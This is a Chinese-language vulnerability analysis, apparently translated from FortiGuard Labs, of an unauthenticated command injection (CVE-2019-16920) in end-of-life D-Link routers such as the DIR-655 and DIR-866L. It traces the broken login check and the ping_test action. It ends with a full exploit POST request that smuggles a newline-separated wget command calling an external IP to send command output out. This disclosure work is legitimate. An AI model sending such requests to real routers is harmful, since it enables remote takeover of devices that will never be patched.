分析多款D-Link路由器中的未授权RCE漏洞-安全客

0x00 前言

2019年9月，Fortinet的FortiGuard Labs发现并向官方反馈了D-Link产品中存在的一个未授权命令注入漏洞（FG-VD-19-117/CVE-2019-16920），成功利用该漏洞后，攻击者可以在设备上实现远程代码执行（RCE）。由于攻击者无需通过身份认证就能远程触发该漏洞，因此我们将该漏洞标记为高危级别漏洞。

根据我们的测试，搭载最新版固件的如下D-Link产品存在该漏洞：

DIR-655
DIR-866L
DIR-652
DHP-1565

在本文撰写时，这些产品已超出产品支持生命周期（EOL），这意味着厂商不会再为我们发现的问题提供补丁。FortiGuard Labs在此感谢厂商的快速响应，建议用户尽快升级到新的设备。

0x01 漏洞细节

设备首先是没有采用正确的身份认证流程，这也是漏洞利用的基础。为了分析该漏洞，我们可以打开路由器管理页面（使用admin用户名），然后尝试登录。

POST /apply_sec.cgi HTTP/1.1
Host: 192.168.232.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Connection: close
Referer: http://192.168.232.128/
Upgrade-Insecure-Requests: 1

html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&
graph_code=&session_id=62384

登录操作由/apply_sec.cgi URI负责处理。快速搜索后，我们发现apply_sec.cgi代码位于/www/cgi/ssi程序的do_ssc函数中（0x40a210）。

current_user和user_username的值来自于nvram：

图1. do_ssc代码片段

该函数随后会将current_user的值与acStack160变量作比较。

只有用户成功登录后，设备才会设置nvram中的current_user值，因此默认情况下，这个值并没有被初始化。acStack160的值为base64encode(user_username)的返回值，默认情况下user_username的值为user，因此iVar2的值不等于0，设备不会返回error.asp页面。

图2. do_ssc代码片段

在do-while循环代码中，设备会调用put_querystring_env()函数来解析HTTP POST请求，将相应值保存到ENV中。接下来，该函数会调用query_vars(“action”, acStack288, 0x80)。

图3. query_vars函数代码片段

该函数会提供action对应的值，保存到ENV中的acStack288变量。如果执行成功，该函数会返回0。

当iVar2等于0时，代码进入if条件分支，将URI值与/apply_sec.cgi作比较。如果满足条件，则ppcVar3指向SSC_SEC_OBJS数组，否则指向的是SSC_OBJS数组。

图4. do_ssc代码片段

现在ppcVar3指向的是SSC_SEC_OBJS数组，该数组包含一系列action值。如果我们输入不在该列表中的一个值，程序会返回LAB_0040a458，输出“No OBJS for action: <action input>”错误信息。

图5. do_ssc中的错误信息

我们可以在图2中看到错误的身份认证过程。即使我们没通过认证，代码仍会继续执行，这意味着我们可以通过/apply_sec.cgi路径，执行SSC_SEC_OBJS中的任意action操作。

那么SSC_SEC_OBJS action数组的具体位置在哪？该数组位于init_plugin()函数的register中：

图6. init_plugin代码片段

如果我们跳转到0x0051d89c地址处，将这些变量值转换为word类型，可以看到如下数组：

图7. 0x0051d89C地址

其中有一个action引起了我们的注意：

图8. ping_test字符串以及对应的action地址

找到sub_41A010，该函数从ping_ipaddr参数中提取输入值，通过inet_aton()、inet_ntoa()函数进行转换，然后执行ping操作。

图9. sub_41A010代码片段

如果尝试输入特殊字符（比如双引号、单引号、分号等），ping操作会执行失败。幸运的是，如果我们传入换行符（比如8.8.8.8%0als），就可以实现命令注入攻击效果。

POST /apply_sec.cgi HTTP/1.1
Host: 192.168.232.128
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
Connection: close
Referer: http://192.168.232.128/login_pic.asp
Cookie: uid=1234123
Upgrade-Insecure-Requests: 1
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://45.76.148.31:4321/?$(echo 1234)

这里我们向apply_sec.cgi发起POST HTTP请求，执行的action为ping_test，然后通过ping_ipaddr参数实现命令注入。虽然路由器返回的是登录页面，但ping_test操作实际上已经成功执行：ping_ipaddr参数值可以在路由器上执行echo 1234命令，然后将结果返回给我们的服务器。